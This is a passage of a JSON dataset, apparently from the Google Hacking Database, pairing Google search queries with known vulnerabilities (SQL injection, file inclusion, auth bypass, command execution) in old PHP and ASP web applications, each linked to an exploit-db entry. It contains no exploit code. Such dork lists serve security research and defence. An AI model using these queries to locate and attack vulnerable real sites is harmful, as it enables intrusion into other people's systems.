"http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PHP+Gallery+%C2%A9+2010+PHP+Weby+hostgator+coupon%22", "shortDescription": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "textualDescription": "Free PHP photo gallery script Remote File inclusion Vulnerability: http://www.exploit-db.com/exploits/14438" }, { "signatureReferenceNumber": "2696", "link": "https://www.exploit-db.com/ghdb/2696/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Rock+Band+CMS+0.10%22", "shortDescription": "\"Powered by Rock Band CMS 0.10\"", "textualDescription": "BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities - CVE: 2009-3252: http://www.exploit-db.com/exploits/9553" }, { "signatureReferenceNumber": "2698", "link": "https://www.exploit-db.com/ghdb/2698/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+Acme+2008", "shortDescription": "Copyright Acme 2008", "textualDescription": "AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability - CVE: 2008-2893: http://www.exploit-db.com/exploits/5890" }, { "signatureReferenceNumber": "2699", "link": "https://www.exploit-db.com/ghdb/2699/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Send+amazing+greetings+to+your+friends+and+relative!%22", "shortDescription": "\"Send amazing greetings to your friends and relative!\"", "textualDescription": "Greeting card SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13983" }, { "signatureReferenceNumber": "2700", "link": "https://www.exploit-db.com/ghdb/2700/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Creative+Guestbook%22", "shortDescription": "\"Creative Guestbook\"", "textualDescription": "Creative Guestbook 1.0 Multiple Remote Vulnerabilities - CVE: 2007-1479: http://www.exploit-db.com/exploits/3489" }, { "signatureReferenceNumber": "2701", "link": "https://www.exploit-db.com/ghdb/2701/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22DeeEmm+CMS%22", "shortDescription": "\"DeeEmm CMS\"", "textualDescription": "DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities - CVE: 2008-3721: http://www.exploit-db.com/exploits/6250" }, { "signatureReferenceNumber": "2702", "link": "https://www.exploit-db.com/ghdb/2702/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PHP+Gallery+%C2%A9+2010+PHP+Weby+hostgator+coupon%22", "shortDescription": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "textualDescription": "ValidForm Builder script Remote Command Execution Vulnerability: http://www.exploit-db.com/exploits/14454" }, { "signatureReferenceNumber": "2703", "link": "https://www.exploit-db.com/ghdb/2703/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=+powered+by+vBulletin+4.0.4", "shortDescription": "powered by vBulletin 4.0.4", "textualDescription": "VBbuletin 4.0.4 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/14686" }, { "signatureReferenceNumber": "2704", "link": "https://www.exploit-db.com/ghdb/2704/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+%C3%82%C2%A9+2007+Agares+Media.+Powered+by+AMCMS3.", "shortDescription": "Copyright \u00c2\u00a9 2007 Agares Media. Powered by AMCMS3.", "textualDescription": "Arcadem Pro (articlecat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6624" }, { "signatureReferenceNumber": "2705", "link": "https://www.exploit-db.com/ghdb/2705/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Vivid+Ads+Shopping+Cart%22", "shortDescription": "\"Vivid Ads Shopping Cart\"", "textualDescription": "Vivid Ads Shopping Cart (prodid) Remote SQL Injection: http://www.exploit-db.com/exploits/10297" }, { "signatureReferenceNumber": "2706", "link": "https://www.exploit-db.com/ghdb/2706/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/rbfminc/%22", "shortDescription": "inurl:\"/rbfminc/\"", "textualDescription": "RogioBiz_PHP_file_manager_V1.2 bypass admin: http://www.exploit-db.com/exploits/11731" }, { "signatureReferenceNumber": "2707", "link": "https://www.exploit-db.com/ghdb/2707/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:Powered+by+AWCM+v2.1", "shortDescription": "intext:Powered by AWCM v2.1", "textualDescription": "AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities - CVE: 2009-3219: http://www.exploit-db.com/exploits/9237" }, { "signatureReferenceNumber": "2709", "link": "https://www.exploit-db.com/ghdb/2709/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22lista_articulos.php%3Fid_categoria%3D%22", "shortDescription": "inurl:\"lista_articulos.php?id_categoria=\"", "textualDescription": "SitioOnline SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10453" }, { "signatureReferenceNumber": "2710", "link": "https://www.exploit-db.com/ghdb/2710/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+AlstraSoft+AskMe+Pro%22", "shortDescription": "\"Powered By AlstraSoft AskMe Pro\"", "textualDescription": "AlstraSoft AskMe Pro 2.1 Multiple SQL Injection Vulnerabilities - CVE: 2008-2902: http://www.exploit-db.com/exploits/5821" }, { "signatureReferenceNumber": "2711", "link": "https://www.exploit-db.com/ghdb/2711/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22com_neogallery%22", "shortDescription": "allinurl:\"com_neogallery\"", "textualDescription": "Joomla Component NeoGallery 1.1 SQL Injection Vulnerability - CVE: 2008-0752: http://www.exploit-db.com/exploits/5083" }, { "signatureReferenceNumber": "2712", "link": "https://www.exploit-db.com/ghdb/2712/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_category%22", "shortDescription": "inurl:\"com_category\"", "textualDescription": "Joomla Component com_category (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9126" }, { "signatureReferenceNumber": "2713", "link": "https://www.exploit-db.com/ghdb/2713/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+Zoopeer%22", "shortDescription": "\"Powered By Zoopeer\"", "textualDescription": "Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability: http://www.exploit-db.com/exploits/15354" }, { "signatureReferenceNumber": "2714", "link": "https://www.exploit-db.com/ghdb/2714/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fortupg%3D", "shortDescription": "inurl:index.php?ortupg=", "textualDescription": "CMS Ortus 1.13 Remote SQL Injection Vulnerability - CVE: 2008-6282: http://www.exploit-db.com/exploits/7237" }, { "signatureReferenceNumber": "2715", "link": "https://www.exploit-db.com/ghdb/2715/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jomtube", "shortDescription": "inurl:com_jomtube", "textualDescription": "Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection: http://www.exploit-db.com/exploits/14434" }, { "signatureReferenceNumber": "2716", "link": "https://www.exploit-db.com/ghdb/2716/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+web+directory+script%22", "shortDescription": "\"Powered by web directory script\"", "textualDescription": "Web Directory Script 1.5.3 (site) SQL Injection Vulnerability - CVE: 2008-4091: http://www.exploit-db.com/exploits/6335" }, { "signatureReferenceNumber": "2717", "link": "https://www.exploit-db.com/ghdb/2717/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_gigcal", "shortDescription": "inurl:com_gigcal", "textualDescription": "Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln - CVE: 2009-0726: http://www.exploit-db.com/exploits/7746" }, { "signatureReferenceNumber": "2718", "link": "https://www.exploit-db.com/ghdb/2718/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+MarketSaz", "shortDescription": "Powered MarketSaz", "textualDescription": "MarketSaz remote file Upload Vulnerability: http://www.exploit-db.com/exploits/13927" }, { "signatureReferenceNumber": "2719", "link": "https://www.exploit-db.com/ghdb/2719/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PHPWebAdmin+for+hMailServer%22+intitle:PHPWebAdmin+-site:hmailserver.com", "shortDescription": "\"PHPWebAdmin for hMailServer\" intitle:PHPWebAdmin -site:hmailserver.com", "textualDescription": "hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities: http://www.exploit-db.com/exploits/7012" }, { "signatureReferenceNumber": "2720", "link": "https://www.exploit-db.com/ghdb/2720/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_ezautos", "shortDescription": "inurl:com_ezautos", "textualDescription": "Joomla Component (com_ezautos) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15085" }, { "signatureReferenceNumber": "2721", "link": "https://www.exploit-db.com/ghdb/2721/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Designed+%26+Developed+by+Zeeways.com%22", "shortDescription": "\"Designed & Developed by Zeeways.com\"", "textualDescription": "zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6915: http://www.exploit-db.com/exploits/7058" }, { "signatureReferenceNumber": "2722", "link": "https://www.exploit-db.com/ghdb/2722/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Dcom_education_classes", "shortDescription": "inurl:option=com_education_classes", "textualDescription": "joomla component education SQL injection Vulnerability: http://www.exploit-db.com/exploits/12153" }, { "signatureReferenceNumber": "2723", "link": "https://www.exploit-db.com/ghdb/2723/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22lyrics_menu/lyrics_song.php%3Fl_id%3D%22", "shortDescription": "allinurl:\"lyrics_menu/lyrics_song.php?l_id=\"", "textualDescription": "e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability - CVE: 2008-4906: http://www.exploit-db.com/exploits/6885" }, { "signatureReferenceNumber": "2726", "link": "https://www.exploit-db.com/ghdb/2726/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=infusions/recept/recept.php%3F", "shortDescription": "infusions/recept/recept.php?", "textualDescription": "PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability - CVE: 2008-4527: http://www.exploit-db.com/exploits/6683" }, { "signatureReferenceNumber": "2727", "link": "https://www.exploit-db.com/ghdb/2727/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+2010+My+Hosting.+All+rights+reserved", "shortDescription": "Copyright 2010 My Hosting. All rights reserved", "textualDescription": "Hosting-php-dynamic (Auth Bypass) Vulnerability: http://www.exploit-db.com/exploits/11968" }, { "signatureReferenceNumber": "2729", "link": "https://www.exploit-db.com/ghdb/2729/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+diskos%22", "shortDescription": "\"Powered By diskos\"", "textualDescription": "Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities - CVE: 2009-4798: http://www.exploit-db.com/exploits/8307" }, { "signatureReferenceNumber": "2732", "link": "https://www.exploit-db.com/ghdb/2732/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+2006+%C3%82%C2%A9+Flax+Article+Manager+v1.1", "shortDescription": "Copyright 2006 \u00c2\u00a9 Flax Article Manager v1.1", "textualDescription": "Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability - CVE: 2009-0284: http://www.exploit-db.com/exploits/7862" }, { "signatureReferenceNumber": "2734", "link": "https://www.exploit-db.com/ghdb/2734/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+PHP+Image+Gallery", "shortDescription": "Powered by PHP Image Gallery", "textualDescription": "SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln - CVE: 2008-6488: http://www.exploit-db.com/exploits/7021" }, { "signatureReferenceNumber": "2736", "link": "https://www.exploit-db.com/ghdb/2736/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By+Pligg+|+Legal:+License+and+Source", "shortDescription": "Powered By Pligg | Legal: License and Source", "textualDescription": "Pligg CMS 9.9.0 (story.php id) Remote SQL Injection Vulnerability - CVE: 2008-3366: http://www.exploit-db.com/exploits/6146" }, { "signatureReferenceNumber": "2737", "link": "https://www.exploit-db.com/ghdb/2737/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PHP+Gallery+%C2%A9+2010+PHP+Weby+hostgator+coupon%22", "shortDescription": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "textualDescription": "Free PHP photo gallery script Remote Command Execution Vulnerability: http://www.exploit-db.com/exploits/14437" }, { "signatureReferenceNumber": "2738", "link": "https://www.exploit-db.com/ghdb/2738/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/_blogadata/", "shortDescription": "inurl:/_blogadata/", "textualDescription": "Blogator-script 0.95 Change User Password Vulnerability - CVE: 2008-6473: http://www.exploit-db.com/exploits/5370" }, { "signatureReferenceNumber": "2739", "link": "https://www.exploit-db.com/ghdb/2739/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_chronocontact%22+/+%22com_chronocontact%22", "shortDescription": "\"index.php?option=com_chronocontact\" / \"com_chronocontact\"", "textualDescription": "Joomla Component ChronoForms (com_chronocontact): http://www.exploit-db.com/exploits/12843" }, { "signatureReferenceNumber": "2741", "link": "https://www.exploit-db.com/ghdb/2741/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_a6mambocredits%22", "shortDescription": "inurl:\"com_a6mambocredits\"", "textualDescription": "Mambo a6mambocredits Component 1.0.0 File Include Vulnerability - CVE: 2006-4288: http://www.exploit-db.com/exploits/2207" }, { "signatureReferenceNumber": "2742", "link": "https://www.exploit-db.com/ghdb/2742/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Fid_menu%3D%22+CMScontrol", "shortDescription": "\"index.php?id_menu=\" CMScontrol", "textualDescription": "CMScontrol (Content Management Portal Solutions) Sql Injection - CVE: 2009-3326: http://www.exploit-db.com/exploits/9727" }, { "signatureReferenceNumber": "2743", "link": "https://www.exploit-db.com/ghdb/2743/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_eventcal%22", "shortDescription": "inurl:\"com_eventcal\"", "textualDescription": "Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14187" }, { "signatureReferenceNumber": "2744", "link": "https://www.exploit-db.com/ghdb/2744/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22and+Powered+By+:Sansak%22", "shortDescription": "\"and Powered By :Sansak\"", "textualDescription": "WebBoard 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability: http://www.exploit-db.com/exploits/6303" }, { "signatureReferenceNumber": "2746", "link": "https://www.exploit-db.com/ghdb/2746/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:profile.php%3Fmode%3D", "shortDescription": "inurl:profile.php?mode=", "textualDescription": "PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability): http://www.exploit-db.com/exploits/14440" }, { "signatureReferenceNumber": "2747", "link": "https://www.exploit-db.com/ghdb/2747/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By+SalSa+Creations", "shortDescription": "Powered By SalSa Creations", "textualDescription": "ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability - CVE: 2008-5489: http://www.exploit-db.com/exploits/7128" }, { "signatureReferenceNumber": "2748", "link": "https://www.exploit-db.com/ghdb/2748/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:modules.php%3Fop%3D+%22pollID%22", "shortDescription": "inurl:modules.php?op= \"pollID\"", "textualDescription": "MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability - CVE: 2009-2618: http://www.exploit-db.com/exploits/9021" }, { "signatureReferenceNumber": "2749", "link": "https://www.exploit-db.com/ghdb/2749/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+SazCart%22", "shortDescription": "\"Powered by SazCart\"", "textualDescription": "SazCart 1.5.1 (prodid) Remote SQL Injection - CVE: 2008-2411: http://www.exploit-db.com/exploits/5576" }, { "signatureReferenceNumber": "2750", "link": "https://www.exploit-db.com/ghdb/2750/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by+Max.Blog%22", "shortDescription": "intext:\"Powered by Max.Blog\"", "textualDescription": "Max.Blog 1.0.6 (offline_auth.php) Offline Authentication Bypass - CVE: 2009-0409: http://www.exploit-db.com/exploits/7899" }, { "signatureReferenceNumber": "2751", "link": "https://www.exploit-db.com/ghdb/2751/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+CMSimple%22", "shortDescription": "\"Powered by CMSimple\"", "textualDescription": "CMSimple 3.1 Local File Inclusion / Arbitrary File Upload - CVE: 2008-2650: http://www.exploit-db.com/exploits/5700" }, { "signatureReferenceNumber": "2752", "link": "https://www.exploit-db.com/ghdb/2752/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_performs%22", "shortDescription": "inurl:\"com_performs\"", "textualDescription": "perForms Mambo Component 1.0 Remote File Inclusion - CVE: 2006-3774: http://www.exploit-db.com/exploits/2025" }, { "signatureReferenceNumber": "2753", "link": "https://www.exploit-db.com/ghdb/2753/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_mambowiki%22", "shortDescription": "inurl:\"com_mambowiki\"", "textualDescription": "Mambo MamboWiki Component 0.9.6 Remote Include Vulnerability - CVE: 2006-4282: http://www.exploit-db.com/exploits/2213" }, { "signatureReferenceNumber": "2754", "link": "https://www.exploit-db.com/ghdb/2754/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index.asp%3Farchivio%3DOK", "shortDescription": "index.asp?archivio=OK", "textualDescription": "Ublog access version Arbitrary Database Disclosure: http://www.exploit-db.com/exploits/8610" }, { "signatureReferenceNumber": "2755", "link": "https://www.exploit-db.com/ghdb/2755/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=album.asp%3Fpic%3D+.jpg+cat%3D", "shortDescription": "album.asp?pic= .jpg cat=", "textualDescription": "aspWebAlbum 3.2 Multiple Remote Vulnerabilities - CVE: 2008-6977: http://www.exploit-db.com/exploits/6420" }, { "signatureReferenceNumber": "2757", "link": "https://www.exploit-db.com/ghdb/2757/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Multi-Page+Comment+System%22", "shortDescription": "\"Multi-Page Comment System\"", "textualDescription": "Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability - CVE: 2008-2293: http://www.exploit-db.com/exploits/5630" }, { "signatureReferenceNumber": "2759", "link": "https://www.exploit-db.com/ghdb/2759/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_wmtpic%22", "shortDescription": "inurl:\"com_wmtpic\"", "textualDescription": "Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14128" }, { "signatureReferenceNumber": "2760", "link": "https://www.exploit-db.com/ghdb/2760/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fmode%3Dgame_player", "shortDescription": "inurl:index.php?mode=game_player", "textualDescription": "Tycoon CMS Record Script SQL Injection Vulnerability - CVE: 2010-3027: http://www.exploit-db.com/exploits/14572" }, { "signatureReferenceNumber": "2761", "link": "https://www.exploit-db.com/ghdb/2761/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22pages.php%3Fpage_ID%3D%22+%22K9+Kreativity%22", "shortDescription": "\"pages.php?page_ID=\" \"K9 Kreativity\"", "textualDescription": "K9 Kreativity Design (pages.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12866" }, { "signatureReferenceNumber": "2763", "link": "https://www.exploit-db.com/ghdb/2763/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=album.asp%3Fpic%3D+.jpg+cat%3D", "shortDescription": "album.asp?pic= .jpg cat=", "textualDescription": "aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6977: http://www.exploit-db.com/exploits/6357" }, { "signatureReferenceNumber": "2764", "link": "https://www.exploit-db.com/ghdb/2764/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22option%3Dcom_simpleshop%22+%26+inurl:%22viewprod%22", "shortDescription": "inurl:\"option=com_simpleshop\" & inurl:\"viewprod\"", "textualDescription": "Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14501" }, { "signatureReferenceNumber": "2765", "link": "https://www.exploit-db.com/ghdb/2765/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by+Community+CMS%22", "shortDescription": "intext:\"Powered by Community CMS\"", "textualDescription": "Community CMS 0.5 Multiple SQL Injection Vulnerabilities - CVE: 2009-4794: http://www.exploit-db.com/exploits/8323" }, { "signatureReferenceNumber": "2766", "link": "https://www.exploit-db.com/ghdb/2766/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Scallywag%22", "shortDescription": "\"Powered by Scallywag\"", "textualDescription": "Scallywag (template.php path) Remote File Inclusion Vulnerabilities - CVE: 2007-2900: http://www.exploit-db.com/exploits/3972" }, { "signatureReferenceNumber": "2767", "link": "https://www.exploit-db.com/ghdb/2767/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22phshoutbox.php%22", "shortDescription": "inurl:\"phshoutbox.php\"", "textualDescription": "PhShoutBox 1.5 (final) Insecure Cookie Handling Vulnerability - CVE: 2008-1971: http://www.exploit-db.com/exploits/5467" }, { "signatureReferenceNumber": "2769", "link": "https://www.exploit-db.com/ghdb/2769/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_seyret%22+/+%22com_seyret%22", "shortDescription": "\"index.php?option=com_seyret\" / \"com_seyret\"", "textualDescription": "Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/14183" }, { "signatureReferenceNumber": "2770", "link": "https://www.exploit-db.com/ghdb/2770/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_memberdirectorymanager.asp", "shortDescription": "inurl:inc_memberdirectorymanager.asp", "textualDescription": "DMXReady Member Directory Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0427: http://www.exploit-db.com/exploits/7773" }, { "signatureReferenceNumber": "2771", "link": "https://www.exploit-db.com/ghdb/2771/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22mod%3Dnotizie%22", "shortDescription": "inurl:\"mod=notizie\"", "textualDescription": "XCMS 1.83 Remote Command Execution - CVE: 2007-6652: http://www.exploit-db.com/exploits/4813" }, { "signatureReferenceNumber": "2772", "link": "https://www.exploit-db.com/ghdb/2772/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+ScozNews%22", "shortDescription": "\"Powered By ScozNews\"", "textualDescription": "ScozNews 1.2.1 (mainpath) Remote File Inclusion Vulnerability - CVE: 2006-2487: http://www.exploit-db.com/exploits/1800" }, { "signatureReferenceNumber": "2774", "link": "https://www.exploit-db.com/ghdb/2774/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PHP+BP+Team%22", "shortDescription": "\"PHP BP Team\"", "textualDescription": "phpBP RC3 (2.204) FIX4 Remote SQL Injection Vulnerability - CVE: 2008-1408: http://www.exploit-db.com/exploits/5263" }, { "signatureReferenceNumber": "2775", "link": "https://www.exploit-db.com/ghdb/2775/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22picture.php%3Fcat%3D%22+%22Powered+by+PhpWebGallery+1.3.4%22", "shortDescription": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "textualDescription": "PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities - CVE: 2008-4591: http://www.exploit-db.com/exploits/6425" }, { "signatureReferenceNumber": "2776", "link": "https://www.exploit-db.com/ghdb/2776/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22zcat.php%3Fid%3D%22", "shortDescription": "inurl:\"zcat.php?id=\"", "textualDescription": "IRAN N.E.T E-commerce Group SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10350" }, { "signatureReferenceNumber": "2777", "link": "https://www.exploit-db.com/ghdb/2777/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:K-Search,+Powered+By+K-Search", "shortDescription": "inurl:K-Search, Powered By K-Search", "textualDescription": "K-Search (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2010-2457: http://www.exploit-db.com/exploits/13993" }, { "signatureReferenceNumber": "2778", "link": "https://www.exploit-db.com/ghdb/2778/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_chronoconnectivity%22+/+%22com_chronoconnectivity", "shortDescription": "\"index.php?option=com_chronoconnectivity\" / \"com_chronoconnectivity\"", "textualDescription": "Joomla Component ChronoConnectivity: http://www.exploit-db.com/exploits/12842" }, { "signatureReferenceNumber": "2781", "link": "https://www.exploit-db.com/ghdb/2781/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+cP+Creator+v2.7.1", "shortDescription": "Powered by cP Creator v2.7.1", "textualDescription": "cP Creator v2.7.1 Remote Sql Injection - CVE: 2009-3330: http://www.exploit-db.com/exploits/9726" }, { "signatureReferenceNumber": "2782", "link": "https://www.exploit-db.com/ghdb/2782/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_mscomment%22", "shortDescription": "inurl:\"com_mscomment\"", "textualDescription": "Joomla Component MS Comment LFI Vulnerability - CVE: 2010-2050: http://www.exploit-db.com/exploits/12611" }, { "signatureReferenceNumber": "2784", "link": "https://www.exploit-db.com/ghdb/2784/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by++Mitra+Informatika+Solusindo", "shortDescription": "Powered by Mitra Informatika Solusindo", "textualDescription": "Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5214" }, { "signatureReferenceNumber": "2785", "link": "https://www.exploit-db.com/ghdb/2785/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=2009+%C2%A9+Satellite-X", "shortDescription": "2009 \u00a9 Satellite-X", "textualDescription": "Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11962" }, { "signatureReferenceNumber": "2787", "link": "https://www.exploit-db.com/ghdb/2787/", "category": "Advisories and Vulnerabilities", "querystring": 